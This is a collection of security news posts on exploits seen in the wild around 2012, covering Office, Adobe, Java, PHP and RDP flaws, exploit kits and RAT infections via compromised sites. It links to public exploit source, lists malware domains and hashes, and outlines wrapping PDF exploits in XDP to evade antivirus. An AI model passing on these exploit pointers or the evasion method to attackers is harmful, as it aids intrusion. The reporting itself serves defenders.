Opening an email containing RTF in Outlook hands your computer to hackers

How many of you are using Microsoft Outlook in your office? Previewing or opening an email containing .RTF file in Microsoft Outlook will open a backdoor for remote hackers to access your machine.

Microsoft warned today that attackers are exploiting a new zero-day vulnerability in Microsoft Word that allows them to run arbitrary code in the vulnerable system.

"The vulnerability could allow remote code execution if a user opens a specially crafted RTF file using an affected version of Microsoft Word" Security advisory reads. "or previews or opens a specially crafted RTF email message in Microsoft Outlook while using Microsoft Word as the email viewer."

The vulnerability affects Microsoft word 2003, 2007,2010,2013, word viewer and Microsoft Office for Mac 2011.  Advisory states that the exploits it has seen so far have targeted Microsoft word 2010 users.

Microsoft is in the process of creating patch for this security flaw.  In the meantime, they have released a temporary Fix it solution which prevents opening of RTF files in Microsoft word.

Other suggestion to prevent yourself from being victim are 'configuring the outlook to read email messages in plain text format', 'using Enhanced Mitigation Experience Toolkit(EMET)'.

CVE-2009-0927 : PDF Exploit targets Aviation Defense Industry

PDF exploits

Security Researcher have come across a Spam email that leads to a malware page which delivers the PDF exploit(CVE-2009-0927).    The campaign seems to be targeting the aviation defense Industry.

About CVE-2009-0927:
A stack-based buffer overflow vulnerability in the Adobe Reader and Adobe Acrobat before 9.1, 8 before 8.1.3 , and 7 before 7.1.1 allows remote attackers to execute arbitrary code via a crafted argument to the getIcon method of a Collab object "Collab.getIcon()".
If the recipient open the malicious PDF file, it opens a fake document and displays an invitation to an actual defense industry event. In the background, it exploits the PDF vulnerability.

If the victim's machine has the vulnerable version , then shellcode inside the pdf will start to execute.  The shellcode creates a file and run "evtmgr.exe in the Temp folder .

The exe file drops another dll file called mssrt726.dll which performs network communication and opens the backdoor at TCP port 49163.



CVE-2012-4681 : New zero-day Java Exploit added to Blackhole Exploit kit


As we expected , The Cyber criminals have added the New zero-day java exploit to the BlackHole Exploit kit.

According to a post of Paunch, the Blackhole creator, the actual java 0 day (CVE-2012-4681) is available for Blackhole owner since yesterday evening.

"ATTENTION! Added 0day Java exploit to knock for new clothes, breaking is cool ... competitors - Tightens)))" He said(translated).

The exploited vulnerability exists in all versions of Java 7, and can be used to exploit not just Windows, but also Apple OS X and Linux systems

As there is no patch from Oracle, the only solution to protect you from this attack is disabling the Java.

Update: The exploit has been included in other exploit kits includeing redkit,sakura kits.

[POC] Source code for the New 0-day Java Exploit is available


Security Researchers from FireEye have reported that a new Zero-day Java vulnerability is currently being exploited in a wild. The most of the recent Java run-time environments i.e., JRE 1.7x are vulnerable.

Initially , Researchers discovered that this exploit hosted on named ok.XXX4.net. Currently this domain is resolving to an IP address in China.

A successful exploit attempt can result in a dropper (Dropper.MsPMs) getting installed on infected systems. The dropper executable is located on the same server.(http://ok.XXX4.net/meeting/hi.exe)

The Dropper.MsPMs connects to C&C domain hello.icon.pk which is currently resolving to an IP address 223.25.233.244 located in Singapore.

POC:
Metasploit researchers has developed a metasploit module that exploit this latest vulnerability and the source code is available in public(http://pastie.org/4594319). 

Researchers successfully exploit a fully patched Windows 7 SP1 with Java 7 Update 6.They  have also tested the module against the following environments:

  • Mozilla Firefox on Ubuntu Linux 10.04
  • Internet Explorer / Mozilla Firefox / Chrome on Windows XP
  • Internet Explorer / Mozilla Firefox on Windows Vista
  • Internet Explorer / Mozilla Firefox on Windows 7
  • Safar on OS X 10.7.4

While this is in the wild, this is not being widely used at this time.  What is more worrisome is the potential for this to be used by other malware developers in the near future. I believe that this exploit will soon be rolled into the BlackHole exploit kit.

Java users should take this problem seriously, because there is currently no patch from Oracle. We recommend users to either unplug Java from your browser or uninstall it from your computer completely.

CVE-2012-1535: Adobe Flash player being exploited in the wild


A word document 'iPhone 5 Battery.doc' containing a malicious embedded flash file explotis the recently patched Adobe Flash player vulnerability(CVE-2012-1535), Alienvault researchers warns.

About CVE-2012-1535:Unspecified vulnerability in Adobe Flash Player before 11.3.300.271 on Windows and Mac OS X and before 11.2.202.238 on Linux allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted SWF content.

Once victim open the the malicious document , it will exploit the vulnerability and executes the shellcode. Once the payload is executed, it drops a malicious dll file. While executing the malicious code, the malware displays a genuine article about leaked iPhone 5 battery Images.

This backdoor is know as c0d0so0 and also Backdoor.Briba and it has been seen in other targeted attacks exploiting CVE-2012-0779 among others during the past few months.

The backdoor contacts the remote sever publicnews.mooo.com using a HTTP POST request and attempts to download an executable file encapsulated in a ZIP and disguised as a GIF.

"The use of Dynamic DNS providers like DynDNS.org , 3322.net.. is very common in this kind of threats. You should be monitoring the requests to dynamic dns providers in your network,"Researcher says.

Nepalese Government Sites hacked and serves Zegost RAT

Nepalese Government Sites exploits java vulnerability and infects users system with Zegost malware 

Researchers have detected that two Nepalese government websites, the National Information Technology Center (NITC) and the Office of the Prime Minister and Council Minister (nitc.gov.np and opmcm.gov.np respectively), have been compromised and serves Zegost(Gh0st RAT) malware.

The site injected with malicious code that tries to exploit the Java vulnerability CVE-2012-0507. After successul exploitation, it will infect the visitor system with the Zegost.

Interestingly, the binary installed on infected machines as part of the attack is signed by a valid certificate issued by VeriSign.

"The main page was injected with a Java JAR file loader which once rendered by the Web browser is executed and attempts to exploit the CVE-2012-0507 vulnerability. The name used for the Java class name ("msf.x.Exploit.class") and the content of the file confirmed that the code was taken from the Metasploit framework" Gianluca Giuliani of Websense said in an analysis of the attack.

"If the exploit code in the JAR file has been successfully executed, the exploit shellcode downloads and runs the executable file named "tools.exe" on the impacted system (MD5: 3c7b7124f84cc4d29aa067eca6110e2f),"

Zegost is a known Remote-Administration Tool(RAT) that's been used in other targeted attacks, specifically in Asia. Once on an infected machine, the backdoor used in the attack on the Nepalese sites initiates an outbound connection to a C&C server hosted on a domain in China at "who.xhhow4.com".


That same Java vulnerability was used in attacks earlier this year on Amnesty International and the Institute for National Security Studies in Israel, Websense said.

AV Bypass for Malicious PDFs Using XML Data Package (XDP) format

Security researcher Brandon Dixon has discovered a way to bypass the Antivirus detection for malicious PDFs using the XML Data Package(XDP) format.

XDP is an XML file format created by Adobe Systems in 2003. It is intended to be an XML-based companion to PDF. It allows PDF content and/or Adobe XML Forms Architecture (XFA) resources to be packaged within an XML container.

As XDP files are opened by Adobe Reader just like a normal PDF would be , opening the malicious XDP file can result in Adobe Reader Exploit.

Dixon's test document, which uses a two-year-old security vulnerability in Adobe Reader, was only detected by one anti-virus package in his tests. After experimenting with the XDP format, he was able to create another file that fooled all 42 anti-virus engines used on VirusTotal.

"The exploit is old. The JS is not encoded. This shoud be fixed. If you are wondering how to combat against this on your network or in your inbox, then look for XDP files."Dixon said in his blog.

"Of course, one could simply change the extension and still trick the user, but only awareness can fix that. For those with DPI, look for the Adobe XDP namespace and base64 code to identify the PDF embedded inside. "

PHP 5.4 Remote Exploit PoC in the wild

There is a remote exploit in the wild for PHP 5.4.3 in Windows, which takes advantage of a vulnerability in the com_print_typeinfo function. The php engine needs to execute the malicious code, which can include any shellcode like the the ones that bind a shell to a port.

The exploit can be found here:
http://www.exploit-db.com/exploits/18861/

Since there is no patch available for this vulnerability yet, you might want to do the following:
  • Block any file upload function in your php applications to avoid risks of exploit code execution.
  • Use your IPS to filter known shellcodes like the ones included in metasploit.
  • Keep PHP in the current available version, so you can know that you are not a possible target for any other vulnerability like CVE-2012-2336 registered at the beginning of the month.
  • Use your HIPS to block any possible buffer overflow in your system.
Reference:
isc.sans.edu

    The Amnesty International UK site hacked, serves GH0st RAT


    The Amnesty International UK website was compromised between May 8 and 9 and infect visitors with infamous Gh0st RAT, WebSense informs.

    After analyzing the incident, WebSense researchers has found that the injection is similar to the one that affected INSS site last week , injected with malicious java code. The Java file try to exploit the famous Java vulnerability (CVE-2012-0507).

    Injected malicious code

    Once the exploit is successful, it downloads an executable file"sethc.exe", it creates a new binary file in the Windows system directory: C:\Program Files\... Interestingly, executable file has been signed by a "valid" certificate authority (CA).


    According to the web sense researchers, this is not the first time when the site of Amnesty International UK is being infected with malware.

    RedKit: a new private exploit kit spotted in the wild

    Trustwave security researchers have spotted a new private exploit kit in the wild. The new kit has no official name, so the researchers dubbed it'Redkit' due to the red bordering used in the application's panel.

    The developers promote the kit with a standard banner, the buyers are required to share their Jabber username by filling the online form hosted on a compromised site of some unsuspecting Christian church.

    "Logging to the admin panel presents you with options which are typically used by other exploit kits.The panel allows you to check the statistics for incoming traffic, upload a payload executable and even scan this payload with no less than 37(!) different AV’s." Trustwave researchers said.

    As each malicious URL gets blocked by most security firms after 24 to 48 hours, the Redkit's author have provide a new API which will produce a fresh URL every hour, so that customer of this exploit kit can now set up an automated process for updating the traffic sources every hour or so to point to the new URL.

    The kit exploits two of the most popular vulnerabilities but the authors probably will add more exploits soon in order to catch up with the “industry leaders” such as BlackHole and Phoenix exploit kits.

    The first exploit is a fairly obfuscated PDF file that exploits the LibTIFF vulnerability (CVE-2010-0188) and the second one is Java AtomicReferenceArray vulnerability (CVE-2012-0507).

    The Institute for National Security Studies (Israel) website serves Poison Ivy RAT


    The official website of Institute for National Security Studies (INSS) website in Israel was injected with malicious code, warns Websense security researchers.

    Interestingly, the injected code try to exploit the same Java exploit vector (CVE-2012-0507) that managed to infect around 600,000 Mac users in a massive scatter attack dubbed Flashback a few weeks ago.

    When a user visit the website, the injected malicious Javascript code loads a Java exploiter. The injected code shown below consists of a "document.write" function call that uses decimal-encoded string characters to hide the exploit URL. Once decoded, it redirects user to exploit page.



    The exploit page hosts a 'test.jar' file that exploits of the well-known Java vulnerability CVE-2012-0507.

    After analyzing the contents of the Jar file, researchers found that it was generated by the Metasploit toolkit, holds the vulnerability CVE-2012-0507. A variant of Poison Ivy RAT is automatically installed on the victim's computer after a successful java exploitation.

    Hackers developed Exploit code for RDP vulnerability


    Chinese Hackers have released a proof of concept[POC] code that tries to exploit the recently patched windows RDP vulnerability. When Microsoft released the patch for RDP vulnerability, they urged customers to update their product as soon as possible, especially since they were expecting that an exploit would be developed in the next 30 days. But, Hackers took less than three days and released a working POC.

    SophosLabs researchers found one Chinese website has exploit code written in Python scripts. The code attempts to exploit the MS12-020 RDP vulnerability and causes Windows computers to blue screen.

    Even though the script only cause a blue screen death for now, the hackers wont' take long time to develop the exploit to produce a fast-spreading internet worm.

    Also researchers come across a fake exploits for the Microsoft RDP vulnerability that claims to be the Python script of a worm .  "It references a Python module that doesn't exist (FreeRDP), and claims to be written by sabu@fbi.gov, an obvious reference to the high profile Anonymous hacker who was recently revealed to have been secretly working for the FBI for months."Researcher said.